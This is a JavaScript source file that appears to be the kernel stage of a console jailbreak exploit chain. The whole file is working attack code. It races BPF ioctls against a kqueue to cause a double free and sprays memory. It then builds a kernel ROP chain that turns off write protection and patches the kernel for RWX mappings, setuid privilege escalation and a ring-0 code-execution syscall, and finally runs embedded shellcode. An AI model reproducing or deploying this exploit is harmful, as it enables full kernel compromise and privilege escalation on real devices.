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kernel.js
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kernel.js
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function kernExploit() {
try {
var offsetToWebKit = function (o) {
return window.webKitBase.add32(o);
}
var fd = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
var fd1 = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
if (fd == (-1 >>> 0)) {
throw "Failed to open first bpf device!"
}
// Write BPF programs
var bpf_valid = p.malloc32(0x4000);
var bpf_spray = p.malloc32(0x4000);
var bpf_valid_u32 = bpf_valid.backing;
var bpf_valid_prog = p.malloc(0x40);
p.write8(bpf_valid_prog, 0x800 / 8)
p.write8(bpf_valid_prog.add32(8), bpf_valid)
var bpf_spray_prog = p.malloc(0x40);
p.write8(bpf_spray_prog, 0x800 / 8)
p.write8(bpf_spray_prog.add32(8), bpf_spray)
for (var i = 0; i < 0x400;) {
bpf_valid_u32[i++] = 6;
bpf_valid_u32[i++] = 0;
}
var rtv = p.syscall("sys_ioctl", fd, 0x8010427B, bpf_valid_prog);
if(rtv.low != 0) {
throw "Failed to open first bpf device!";
}
// Spawn thread
var spawnthread = function (name, chain) {
var longjmp = window.webKitBase.add32(0x14e8);
var createThread = window.webKitBase.add32(0x779390);
var contextp = p.malloc32(0x2000);
var contextz = contextp.backing;
contextz[0] = 1337;
var thread2 = new rop();
thread2.push(window.gadgets["ret"]);
thread2.push(window.gadgets["ret"]);
thread2.push(window.gadgets["ret"]);
thread2.push(window.gadgets["ret"]);
chain(thread2);
p.write8(contextp, window.gadgets["ret"]);
p.write8(contextp.add32(0x10), thread2.stackBase);
p.syscall(324, 1);
var retv = function () { p.fcall(createThread, longjmp, contextp, p.stringify(name)); }
window.nogc.push(contextp);
window.nogc.push(thread2);
return retv;
}
var interrupt1, loop1;
var interrupt2, loop2;
var sock = p.syscall(97, 2, 2);
var kscratch = p.malloc32(0x1000);
// Racing thread
var start1 = spawnthread("GottaGoFast", function (thread2) {
interrupt1 = thread2.stackBase;
thread2.push(window.gadgets["ret"]);
thread2.push(window.gadgets["ret"]);
thread2.push(window.gadgets["ret"]);
thread2.push(window.gadgets["pop rdi"]);
thread2.push(fd);
thread2.push(window.gadgets["pop rsi"]);
thread2.push(0x8010427B);
thread2.push(window.gadgets["pop rdx"]);
thread2.push(bpf_valid_prog);
thread2.push(window.gadgets["pop rsp"]);
thread2.push(thread2.stackBase.add32(0x800));
thread2.count = 0x100;
var cntr = thread2.count;
thread2.push(window.syscalls[54]); // ioctl
thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
thread2.push(window.gadgets["pop rdi"]);
var wherep = thread2.pushSymbolic();
thread2.push(window.gadgets["pop rsi"]);
var whatp = thread2.pushSymbolic();
thread2.push(window.gadgets["mov [rdi], rsi"]);
thread2.push(window.gadgets["pop rsp"]);
loop1 = thread2.stackBase.add32(thread2.count * 8);
thread2.push(0x41414141);
thread2.finalizeSymbolic(wherep, loop1);
thread2.finalizeSymbolic(whatp, loop1.sub32(8));
});
// start setting up chains
var krop = new rop();
var race = new rop();
/**
* Qwerty Madness!
* -
* This section contains magic. It's for bypassing Sony's ghetto "SMAP".
* Need to be a level 99 mage to understand this completely (not really but kinda). ~ Specter
**/
var ctxp = p.malloc32(0x2000);
var ctxp1 = p.malloc32(0x2000);
var ctxp2 = p.malloc32(0x2000);
p.write8(bpf_spray.add32(16), ctxp);
p.write8(ctxp.add32(0x50), 0);
p.write8(ctxp.add32(0x68), ctxp1);
var stackshift_from_retaddr = 0;
p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // sub rsp
stackshift_from_retaddr += 8 + 0x58;
p.write8(ctxp.add32(0), ctxp2);
p.write8(ctxp.add32(0x10), ctxp2.add32(8));
p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
var iterbase = ctxp2;
for (var i = 0; i < 0xf; i++) {
p.write8(iterbase, offsetToWebKit(0x12A19CD)); // sub rsp
stackshift_from_retaddr += 8 + 0x58;
p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
p.write8(iterbase.add32(8), iterbase.add32(0x20));
p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
iterbase = iterbase.add32(0x20);
}
var raxbase = iterbase;
var rdibase = iterbase.add32(8);
var memcpy = get_jmptgt(webKitBase.add32(0xF8));
memcpy = p.read8(memcpy);
p.write8(raxbase, offsetToWebKit(0x15CA41B));
stackshift_from_retaddr += 8;
p.write8(rdibase.add32(0x70), offsetToWebKit(0x1284834));
stackshift_from_retaddr += 8;
p.write8(rdibase.add32(0x18), rdibase);
p.write8(rdibase.add32(8), krop.stackBase);
p.write8(raxbase.add32(0x30), window.gadgets["mov rbp, rsp"]);
p.write8(rdibase, raxbase);
p.write8(raxbase.add32(0x420), offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90));
var topofchain = stackshift_from_retaddr + 0x28;
p.write8(rdibase.add32(0xB0), topofchain);
for (var i = 0; i < 0x1000 / 8; i++) {
p.write8(krop.stackBase.add32(i * 8), window.gadgets["ret"]);
}
krop.count = 0x10;
/**
* End of Qwerty madness
**/
/**
* Bit of info:
* -
* The "kchain" buffer is used to store the kernel ROP chain, and is managed by the "krop" class defined in rop.js.
* There are also two helper functions for the class, "kpatch" and "kpatch2" for patching the kernel defined below.
* The "kchainstack" buffer should not be used directly as it is managed by the "krop" class!
* -
* The "kscratch" buffer is used to save context. The layout is as follows:
* kscratch + 0x00: contents of rax register (points to kernel base + 0x16DB6C)
* kscratch + 0x08: pointer to function stub that manipulates cr0 (mov rax, cr0; or rax, 5002Ah; mov cr0, rax; ret)
* kscratch + 0x10: contents of cr0 before the write protection bit is flipped for kernel patching
* kscratch + 0x18: pointer to kscratch
* kscratch + 0x40: "pop rax" gadget
* kscratch + 0x420: "pop rdi" gadget
**/
// Helper function for patching kernel
var kpatch = function(offset, qword) {
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch);
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(offset);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(qword);
krop.push(window.gadgets["mov [rax], rsi"]);
}
// Helper function for patching kernel with information from kernel.text
var kpatch2 = function(offset, offset2) {
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch);
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(offset);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["mov rdi, rax"]);
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch);
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(offset2);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["mov [rdi], rax"]);
}
p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
p.write8(kscratch.add32(0x18), kscratch);
krop.push(window.gadgets["pop rdi"]);
krop.push(kscratch.add32(0x18));
krop.push(window.gadgets["mov rbp, rsp"]);
var rboff = topofchain - krop.count * 8 + 0x28;
krop.push(offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
krop.push(window.gadgets["pop rax"]);
krop.push(rboff);
krop.push(window.gadgets["add rdi, rax"]);
krop.push(window.gadgets["mov rax, [rdi]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(0x2FA);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["mov [rdi], rax"]);
var shellbuf = p.malloc32(0x1000);
// Save context of cr0 register
krop.push(window.gadgets["pop rdi"]); // save address in usermode
krop.push(kscratch);
krop.push(window.gadgets["mov [rdi], rax"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(0xC54B4);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["pop rdi"]);
krop.push(kscratch.add32(0x08));
krop.push(window.gadgets["mov [rdi], rax"]);
krop.push(window.gadgets["jmp rax"]);
krop.push(window.gadgets["pop rdi"]); // save cr0
krop.push(kscratch.add32(0x10));
// Disable kernel write protection for .text
krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
krop.push(window.gadgets["pop rsi"]);
krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
krop.push(window.gadgets["and rax, rsi"]);
krop.push(window.gadgets["mov rdx, rax"]);
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch.add32(8));
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(0x9);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["mov rdi, rax"]);
krop.push(window.gadgets["mov rax, rdx"]);
krop.push(window.gadgets["jmp rdi"]);
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch);
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(0x3609A);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rdi"]);
krop.push(kscratch.add32(0x330));
krop.push(window.gadgets["mov [rdi], rax"]);
// Patch sys_mprotect: Allow RWX mapping
patch_mprotect = new int64(0x9090FA38, 0x90909090);
kpatch(0x3609A, patch_mprotect);
// Patch bpf_cdevsw: add back in bpfwrite() implementation for kernel primitives
kpatch(0x133C344, shellbuf);
// Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
var patch_sys_setuid_offset = new int64(0xFFEE6F06, 0xFFFFFFFF);
var patch_sys_setuid = new int64(0x000000B8, 0xC4894100);
kpatch(patch_sys_setuid_offset, patch_sys_setuid);
// Patch amd64_syscall: syscall instruction allowed anywhere
var patch_amd64_syscall_offset1 = new int64(0xFFE92927, 0xFFFFFFFF);
var patch_amd64_syscall_offset2 = new int64(0xFFE92945, 0xFFFFFFFF);
var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49);
var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090);
kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
// Patch: sys_mmap: allow RWX mapping from anywhere
var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF);
var patch_sys_mmap = new int64(0x37B64037, 0x3145C031);
kpatch(patch_sys_mmap_offset, patch_sys_mmap);
// Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
var patch_sys_dynlib_dlsym_1 = new int64(0x0001C1E9, 0x8B489000);
var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090);
kpatch(0xCA3CE, patch_sys_dynlib_dlsym_1);
kpatch(0x144AB4, patch_sys_dynlib_dlsym_2);
// Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
var patch_sys_exec_1 = new int64(0x00F0ECB4, 0);
var patch_sys_exec_2A = new int64(0x00F0ECBC, 0);
var patch_sys_exec_2B = new int64(0xFFEA58F4, 0xFFFFFFFF);
var patch_sys_exec_3 = new int64(0x00F0ECDC, 0);
var patch_sys_exec_param1 = new int64(0x02, 0);
var patch_sys_exec_param3 = new int64(0, 1);
kpatch(patch_sys_exec_1, patch_sys_exec_param1);
kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
kpatch(patch_sys_exec_3, patch_sys_exec_param3);
// Enable kernel write protection for .text
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch.add32(0x08));
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["pop rsi"]);
krop.push(0x09);
krop.push(window.gadgets["add rax, rsi"]);
krop.push(window.gadgets["mov rdi, rax"]);
krop.push(window.gadgets["pop rax"]);
krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
krop.push(window.gadgets["mov rax, [rax]"]);
krop.push(window.gadgets["jmp rdi"]);
krop.push(offsetToWebKit(0x5CDB9)); // Clean up stack
krop.push(kscratch.add32(0x1000));
var kq = p.malloc32(0x10);
var kev = p.malloc32(0x100);
kev.backing[0] = sock;
kev.backing[2] = 0x1ffff;
kev.backing[3] = 1;
kev.backing[4] = 5;
// Shellcode to clean up memory
var shcode = [0x00008be9, 0x90909000, 0x90909090, 0x90909090, 0x0082b955, 0x8948c000, 0x415641e5, 0x53544155, 0x8949320f, 0xbbc089d4, 0x00000100, 0x20e4c149, 0x48c40949, 0x0096058d, 0x8d490000, 0xfe402494, 0x8d4dffff, 0xe09024b4, 0x8d4d0010, 0x5e8024ac, 0x81490043, 0x4b7160c4, 0x10894801, 0x00401f0f, 0x000002ba, 0xe6894c00, 0x000800bf, 0xd6ff4100, 0x393d8d48, 0x48000000, 0xc031c689, 0x83d5ff41, 0xdc7501eb, 0x41c0315b, 0x415d415c, 0x90c35d5e, 0x3d8d4855, 0xffffff78, 0x8948f631, 0x00e95de5, 0x48000000, 0x000bc0c7, 0x89490000, 0xc3050fca, 0x6c616d6b, 0x3a636f6c, 0x25783020, 0x6c363130, 0x00000a58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
for (var i = 0; i < shcode.length; i++) {
shellbuf.backing[i] = shcode[i];
}
// RACE!
var iters = 0;
start1();
while (1) {
race.count = 0;
// Create a kqueue
race.push(window.syscalls[362]);
race.push(window.gadgets["pop rdi"]);
race.push(kq);
race.push(window.gadgets["mov [rdi], rax"]);
// Race against the other thread
race.push(window.gadgets["ret"]);
race.push(window.gadgets["ret"]);
race.push(window.gadgets["ret"]);
race.push(window.gadgets["ret"]);
race.push_write8(loop1, interrupt1);
race.push(window.gadgets["pop rdi"]);
race.push(fd);
race.push(window.gadgets["pop rsi"]);
race.push(0x8010427B);
race.push(window.gadgets["pop rdx"]);
race.push(bpf_valid_prog);
race.push(window.syscalls[54]);
// Attempt to trigger double free()
race.push(window.gadgets["pop rax"]);
race.push(kq);
race.push(window.gadgets["mov rax, [rax]"]);
race.push(window.gadgets["mov rdi, rax"]);
race.push(window.gadgets["pop rsi"]);
race.push(kev);
race.push(window.gadgets["pop rdx"]);
race.push(1);
race.push(window.gadgets["pop rcx"]);
race.push(0);
race.push(window.gadgets["pop r8"]);
race.push(0);
race.push(window.syscalls[363]);
// Spray via ioctl
race.push(window.gadgets["pop rdi"]);
race.push(fd1);
race.push(window.gadgets["pop rsi"]);
race.push(0x8010427B);
race.push(window.gadgets["pop rdx"]);
race.push(bpf_spray_prog);
race.push(window.syscalls[54]);
// Close the poisoned kqueue and run the kROP chain!
race.push(window.gadgets["pop rax"]);
race.push(kq);
race.push(window.gadgets["mov rax, [rax]"]);
race.push(window.gadgets["mov rdi, rax"]);
race.push(window.syscalls[6]);
iters++;
// Gotta go fast!
race.run();
if (kscratch.backing[0] != 0) {
// Hey, we won!
// Clean up memory
p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
p.fcall(shellbuf);
// Refresh to a clean page
location.reload();
return true;
}
}
} catch(ex) {
fail(ex)
}
// failed
return false;
}
kernExploit();